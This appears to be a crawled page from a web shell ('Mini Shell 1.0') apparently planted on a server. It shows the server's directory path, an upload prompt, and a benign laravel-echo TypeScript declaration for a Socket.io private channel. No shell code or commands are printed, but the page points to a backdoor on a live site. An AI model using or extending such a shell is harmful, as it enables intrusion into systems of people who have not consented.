HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /var/www/negocios.lapieza.do/node_modules/laravel-echo/dist/channel/
Upload File :
Current File : /var/www/negocios.lapieza.do/node_modules/laravel-echo/dist/channel/socketio-private-channel.d.ts
import { SocketIoChannel } from './socketio-channel';
/**
 * This class represents a Socket.io private channel.
 */
export declare class SocketIoPrivateChannel extends SocketIoChannel {
    /**
     * Send a whisper event to other clients in the channel.
     */
    whisper(eventName: string, data: any): SocketIoChannel;
}